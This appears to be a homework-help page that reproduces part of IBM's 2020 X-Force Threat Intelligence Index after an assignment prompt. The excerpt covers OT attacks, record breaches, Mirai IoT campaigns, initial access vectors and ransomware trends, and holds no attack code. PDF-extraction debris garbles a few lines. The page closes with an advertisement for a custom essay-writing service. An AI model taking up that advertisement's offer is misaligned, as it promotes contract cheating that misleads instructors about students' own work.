Open and review the 2020 IBM X-Force Threat Intelligence Index [PDF] Download 2020 IBM X-Force Threat Intelligence Index [PDF]. Describe the purpose of th

–

X-Force Threat Intelligence Index 2020

Produced by IBM X Force Incident Response and Intelligence Services (IRIS)

Table of Contents Summary and Key Trends 4

Targeting and Initial Infection Vectors 6

Explosive Growth in Operational Technology (OT) 6 Infrastructure Targeting

Records Breached Grows Dramatically 8

Targeting of IoT Devices Includes Enterprise Realms 9

Phishing Tops Initial Access Vectors in 2019 Attacks 11

Malware Trends 13

Destructive Malware Attacks Dramatically Increase 13

Ransomware and Cryptominers Aggressive in 2019 15

Top Innovators in 2019 Malware Code Evolution 16

Banking Trojans and Ransomware – A Treacherous 19 Matrimony That Keeps Getting Worse

Spam and Phishing Trends 21

2017 Vulnerabilities Continue to Star in 2019 Spam 21

Spam Botnets Hosted in the West, Impact Globally 23

Spam Victims by Geography 24

Blocked Malicious Domains Highlight Prevalence 25 of Anonymization Services

Phishing Impersonated Tech Companies, Social Media 26

Top 10 Spoofed Brands 28

2

–

–

Table of Contents Most Frequently Targeted Industries 29

Finance and Insurance 30

Retail 31

Transportation 32

Media & Entertainment 33

Professional Services 34

Government 35

Education 36

Manufacturing 37

Energy 38

Healthcare 39

Geo Centric Insights 40

North America 41

Asia 42

Europe 43

Middle East 44

South America 45

Preparing for Resilience in 2020 46

Moving Forward with Key Takeaways 47

About X Force 48

3

Summary and Key Trends

Summary and Key Trends

Part 1

IBM Security develops intelligent enterprise security solutions and services to help your business build resilience today for the cybersecurity threats of tomorrow.

To update security professionals about the most relevant threats, IBM X-Force regularly releases blogs, white papers, webinars, and podcasts about emerging threats and attackers’ Tactics, Techniques and Procedures (TTPs).

IBM Security releases the IBM X-Force Threat Intelligence Index annually, summarizing the year past in terms of the most prominent threats raised by our various research teams to provide security teams with information that can help better secure their organizations.

Data and insights presented in this report are derived from IBM Security managed security services, incident response services, penetration testing engagements, and vulnerability management services.

IBM X-Force research teams analyze data from hundreds of millions of protected endpoints and servers, along with data derived from non-customer assets such as spam sensors and honeynets. IBM Security Research also runs spam traps around the world and monitors tens of millions of spam and phishing attacks daily, analyzing billions of web pages and images to detect attack campaigns, fraudulent activity, and brand abuse, to better protect our customers and the connected world we live in.

44

5

IBM Security

Summary and Key Trends Part 1

X-Force Incident Response and Intelligence Services (IRIS) compiled IBM Security software and security services analyses from the past year, which show that 2019 was a year of reemerging old threats being used in new ways.

— According to X-Force data, a 2000 percent increase in operational technology (OT) targeting incidents in 2019 could portend the rising interest of threat actors to attack industrial systems as we move into 2020.

— Over 8.5 billion records were compromised in 2019, a number that’s more than 200 percent greater than the number of records lost in 2018. The inadvertent insider can largely be held responsible for this signifcant rise. Records exposed due to misconfgured servers (including publicly accessible cloud storage, unsecured cloud databases, and improperly secured rsync backups, or open internet connected network area storage devices) accounted for 86 percent of the records compromised in 2019.

— The malware landscape shifted in 2019, with threat actors returning to ransomware and building out botnets. Throughout 2019, X-Force IRIS responded to ransomware engagements in 12 different countries in 5 different continents and across 13 different industries. Additionally, destructive malware activity shows that this potentially catastrophic malware trend continues to be a rising threat.

— The top three initial infection vectors seen in X-Force IRIS engagements in 2019 were a very close frst, second, and third: Phishing (31 percent), Scan and Exploit (30 percent) and Stolen Credentials (29 percent). Phishing, most notably, went from making up nearly half of the total incidents in 2018 to less than a third in 2019. By contrast, the scanning and exploitation of vulnerabilities increased to nearly one-third of the incidents from only making up eight percent in 2018.

— X-Force analysis of global spam activity indicates that spam email continues to use a limited subset of vulnerabilities, with particular focus on just two CVEs: 2017-0199 and 2017-11882. Both of these are patched vulnerabilities that have accounted for nearly 90 percent of the vulnerabilities threat actors attempted to exploit via spam campaigns.

— Though Financial Services retained its top spot as the most targeted sector in 2019, industry- specifc targeting highlighted shifting priorities for threat actors, with Retail, Media, Education, and Government all moving up on the global chart of the most targeted sectors.

— New to the X-Force Threat Intelligence Index this year are geo-centric insights, providing data on observed trends from around the world. IBM Security continues to track multiple threat actors targeting all geographies, and this report highlights key threat actors targeting each region, observed attacks from 2019, and potential dates of cybersecurity interest in 2020.

The following sections of this annual report go over the top-level trends and drill down to information on what shaped them in 2019.

6 IBM Security

Targeting and Initial Infection Vectors Part 2

Targeting and Initial Infection Vectors

– –

Figure 1:

Operational technology (OT) attack trends Monthly OT attack volume, comparing the years 2016 2019 (Source: IBM X Force)

Jan. Feb. Mar. Apr. May Jun. Jul. Aug. Sep. Oct. Nov.

2016 2017 2018 2019

Explosive Growth in Operational Technology (OT) Infrastructure Targeting

IBM X-Force data indicates that events in which threat actors targeted Industrial Control Systems (ICS) and similar Operational Technology (OT) assets increased over 2000 percent since 2018. In fact, the number of events targeting OT assets in 2019 was greater than the activity volume observed in the past three years.

Most of the observed attacks were centered around using a combination of known vulnerabilities within SCADA and ICS hardware components, as well as password-spraying attacks using brute force login tactics against ICS targets.

77

Targeting and Initial Infection Vectors Part 2

Some reported activity focused on ICS attacks has been associated with two known threat actors, and coincided with the spike in the attack timeline we observed in our telemetry. Two specifc campaigns were carried out by the Xenotime group and by IBM Hive0016 (APT33) who reportedly broadened their attacks on ICS targets.

The overlap between IT infrastructure and OT, such as Programmable Logic Controllers (PLCs) and ICS, continued to present a risk to organizations that relied on such hybrid infrastructures in 2019.

The convergence of IT/OT infrastructure allows IT breaches to target OT devices controlling physical assets, which can greatly increase the cost to recover. For example, in early 2019, IBM X-Force IRIS assisted in responding to a breach at a global manufacturing company, where a ransomware infection starting on an IT system moved laterally into OT infrastructure and brought plant operations to a halt. The attack impacted not only the company’s own operations but also caused a ripple effect in global markets.

X-Force IRIS security assessments delivered to our customers through 2019 highlighted the vulnerability of OT systems, which often use legacy software and hardware. Keeping production systems that can no longer be patched and are riddled with older vulnerabilities that have long become public means that even if OT systems are not internet facing, unpatched OT systems might be easy prey. In cases of lateral movement, after an attacker gains the frst foothold, these systems can be accessed from inside the network and harmed by relatively simple exploitation techniques.

Although the ICS network attack trend shown in Figure 1 has been in a downward motion since early October 2019, X-Force expects that attacks against OT/ICS targets will continue to increase in 2020, as various threat actors plot and launch new campaigns against industrial networks across the globe. With more than 200 new ICS-related CVEs released in 2019, IBM X-Force’s vulnerability database shows that threats to ICS will likely continue to grow in 2020.

X-Force expects that attacks against ICS targets will continue to increase in 2020, as various threat actors plot and launch new campaigns against industrial networks across the globe.

IBM Security

–.-…….. …. .·–··–~~–.. r·• " — •- • 4 … . ··– • ·- . . .. • . . . -· . . . . . . " •' . . … . : n, .

• •

– •

– • •

• • • • • • • • •

r • • • —I …. •t

•

Targeting and Initial Infection Vectors Part 2

Records Breached Grows Dramatically

The number of breached records jumped signifcantly in 2019 with over 8.5 billion records exposed – more than three times greater than 2018 year-over-year. The number one reason for this signifcant rise is that records exposed due to misconfgurations increased nearly tenfold year-over-year. These records made up 86 percent of the records compromised in 2019. This is a stark departure from what we reported in 2018 when we observed a 52 percent decrease from 2017 in records exposed due to misconfgurations and these records made up less than half of total records.

Notably, there was actually a decrease in the number of misconfguration incidents in 2019 of 14 percent year-over-year. This fact implies that when a misconfguration breach did occur, the number of records affected was signifcantly greater in 2019. Nearly three-quarters of the breaches where there were more than 100 million records breached were misconfguration incidents. In two of those misconfguration incidents which occurred in the Professional Services sector the exposed record count was in the billions for each incident.

This signifcant increase in lost records across industries highlights the growing risk of data breaches, even for organizations in sectors that were not typically considered prime targets.

2019 breached records

8.5 billion

888

9

–

Figure 2:

Consumer vs. enterprise IoT attacks Monthly volume of consumer vs. enterprise IoT attacks in 2019 (Source: IBM X Force)

Jan. Feb. Mar. Apr. May

Consumer Enterprise

Jun. Jul. Aug. Sep. Oct. Nov.

IBM Security

Targeting and Initial Infection Vectors Part 2

Targeting of IoT Devices Includes Enterprise Realms

With over 38 billion devices expected to be connected to the internet in 2020, the Internet of Things (IoT) threat landscape has been gradually shaping up to be one of the threat vectors that can affect both consumers and enterprise level operations by using relatively simplistic malware and automated, often scripted, attacks.

Within the sphere of malicious code used to infect IoT devices, IBM X-Force research has tracked multiple Mirai malware campaigns in 2019 that have notably shifted from targeting consumer electronics to targeting enterprise-grade hardware as well – activity that we did not observe in 2018. Compromised devices with network access can be used by attackers as a pivoting point in potential attempts to establish a foothold in the organization.

Targeting and Initial Infection Vectors Part 2

Mirai is a prolifc IoT malware that has been used in the hands of multiple attackers since 2016 to cause mass disruption by infecting large numbers of IoT devices and using them in distributed denial of service (DDoS) attacks. In our analysis of 2019 campaigns, we have found that TTPs of those wielding the Mirai malware have robustly changed since 2018, and in 2019 focused on targeting enterprise hardware in addition to consumer electronics.

Looking into attacks that affected IoT devices in 2019, we have observed the widespread use of command injection (CMDi) attacks containing instructions to download malicious payloads targeting various types of IoT devices. Most of these injection attacks are automated by scripts that scan for and attempt to infect devices en masse. If the targeted IoT device is susceptible to these injection attacks, the payload is downloaded and executed, effectively drafting the device to a large IoT botnet. One of the most common enablers of these attacks are IoT devices with weak or default passwords that can be easily guessed by a humble dictionary attack.

101010

11

5% 10%

31%Phishing

30%Scan and exploit

Unauthorized use of 29% credentials

Brute force attack 6%

Mobile device 2%compromise

1%Watering hole

0% 15% 20% 25% 30% 35%

–

Figure 3:

Top initial access vectors Breakdown of the top 6 initial attack vectors in 2019, as a percentage of the six access vectors shown (Source: IBM X Force)

IBM Security

Targeting and Initial Infection Vectors Part 2

Phishing Tops Initial Access Vectors in 2019 Attacks

IBM X-Force IRIS’s extensive incident response capability provides valuable insight on attacker methods and motivations.

At 31 percent, phishing was the most frequent vector used for initial access in 2019, but that is down from 2018 when it comprimised nearly half of the total.1

1 The 2019 X-Force Threat Intelligence Index reported that nearly one-third—29 percent—of attacks analyzed by X-Force IRIS involved compromises via phishing emails. This number has since been adjusted to account for additional evidence that surfaced post publication for several incidents increasing that percentage to 44 percent for 2018.

1212

Summary and Key Trends Part 1Part 2Targeting and Initial Infection Vectors

Most notably in 2019, attackers increasingly scanned target environments for vulnerabilities to exploit, with incident responders fnding this technique used in 30 percent of incidents – up from only 8 percent of total incidents the previous year.

Threat actors have plenty of choices on what to scan and exploit, with IBM X-Force tracking over 150,000 vulnerabilities that have been publicly disclosed. While sophisticated adversaries may develop zero-day exploits, relying on known exploits occurs more frequently as such exploits allow adversaries to gain an initial foothold without having to expend resources to craft new TTPs, saving their best weapons for the most heavily defended networks. Furthermore, attackers bank on organizations not keeping up-to-date with their patch application, even for vulnerabilities where patches have been available for some time. For example, instances of WannaCry infection continue to be observed more than two years since the initial infection and the patch (MS17-010) becoming widely available.

The use of stolen credentials where threat actors use previously obtained credentials to access target organizations came in at a close third at 29 percent. Often these credentials may be stolen from a third- party site or obtained via a phishing attempt against the targeted organization. Threat actors can use stolen credentials to blend in with legitimate traffc, making detection even more challenging.

Brute force attacks dropped year-over-year to a distant fourth position with 6 percent of all cases, followed by BYOD devices at 2 percent as the initial access point into targeted organizations.

X-Force researchers observed a notable uptick in threat actor activity in June and July of 2019, with the number of events eclipsing totals for all of 2019 to that point. While the reason for this sudden surge in activity is unknown, the summer months appear to be more active in terms of spam as well, with peak spam volume recorded in August of 2019. It’s possible that threat actors were simply noisier and more easily detected, or that a change in threat actor tactics or tools generated signifcant activity. Short term peaks of activity are less likely to be the result of new threat actors entering the market, as such new entries would be expected to create a sustained increase in activity rather than a temporary spike.

13

IBM Security

Part 3 Malware trends

Malware trends

Destructive Malware Attacks Dramatically Increase

IBM X-Force IRIS investigations indicate that destructive malware attacks became more frequent and increased in geography and scope through 2019.

Wielded by both cybercriminals and nation state actors, destructive malware is malicious software with the capability to render affected systems inoperable and challenge reconstitution. Most destructive malware variants cause destruction through the deletion or overwriting of fles that are critical to the operating system’s ability to run. In a few cases, destructive malware may send tailored messages to industrial equipment to cause malfunction. Included in our defnition of destructive malware is the type of ransomware that’s capable of wiping data from machines or irreversibly encrypting data on a machine.

Between the second half of 2018 and the second half of 2019 X-Force IRIS responded to the same number of destructive attacks year-over-year, highlighting that this potentially catastrophic malware trend continues to put organizations at risk.

Historically, destructive attacks typically came from nation state adversaries. However, we have been observing a trend where more strains of fnancially- motivated ransomware are incorporating destructive elements into the attack, with variants such as LockerGoga and MegaCortex making their destructive attack debuts in late 2018 and early 2019.

Destructive attacks are estimated to cost an average of $239 million, over 60 times more than the average cost of a data breach.

1144

–

Malware trends Part 3

In late 2019, X-Force IRIS highlighted the discovery of a new destructive malware we named ZeroCleare. This wiper targeted the energy sector in the Middle East and was attributed by IBM to an Iran-affliated APT group ITG132, also known as APT34/OilRig.

X-Force IRIS estimates that the cost of a destructive malware attack to companies can be particularly high, with large multinational companies incurring a cost of $239 million per incident, on average. This cost estimate is over 60 times greater than the average 2019 cost of a data breach as calculated by the Ponemon Institute. Unlike data breaches that steal or expose data, destructive attacks typically see the destruction of up to three-quarters or more of devices on the victimized organization’s networks.

2 ITG stands for IBM Threat Group, a term which is further discussed in the Most Frequently Targeted Industries. X Force uses ITG names, with alternate names for threat groups indicated in parentheses after the ITG name.

14

1515

Malware trends Part 3

Ransomware and Cryptominers Aggressive in 2019

The counts of malware variants and attacks using malware trend up and down through the year, but nonetheless, insight into the types of threats that should take priority can help organizations better manage risk.

In the frst half of 2019, approximately 19 percent of attacks we observed were related to ransomware incidents, compared to only 10 percent of attacks in the second half of 2018. In Q4 2019 there was a 67 percent increase in ransomware engagements compared to Q4 the previous year. Throughout 2019, X-Force IRIS responded to ransomware engagements in 12 different countries in 5 different continents and across 13 different industries.

This surge may be attributed to growing numbers of threat actors and campaigns launched against a variety of organizations in 2019. Of note were municipal and public institutions that suffered ransomware attacks, as well as local government agencies and healthcare providers. Attacks on these types of organizations often caught them unprepared to respond, more likely to pay a ransom, and in some cases under extreme stress to recover from the attack due to threat to public safety and human life.

X-Force data shows that in the cases of ransomware attacks, the top attack vector in 2019 was attempted exploits against vulnerabilities in the Windows Server Message Block (SMB) protocol to propagate through the network. This tactic, which was used previously in WannaCry attacks, accounted for over 80 percent of observed attack attempts.

In Q4 2019 there was a 67 percent increase in ransomware engagements compared to Q4 2018.

<a rel='nofol

Collepals.com Plagiarism Free Papers

Are you looking for custom essay writing service or even dissertation writing services? Just request for our write my paper service, and we'll match you with the best essay writer in your subject! With an exceptional team of professional academic experts in a wide range of subjects, we can guarantee you an unrivaled quality of custom-written papers.

Get ZERO PLAGIARISM, HUMAN WRITTEN ESSAYS

Why Hire Collepals.com writers to do your paper?

Quality- We are experienced and have access to ample research materials.

We write plagiarism Free Content

Confidential- We never share or sell your personal information to third parties.

Support-Chat with us today! We are always waiting to answer all your questions.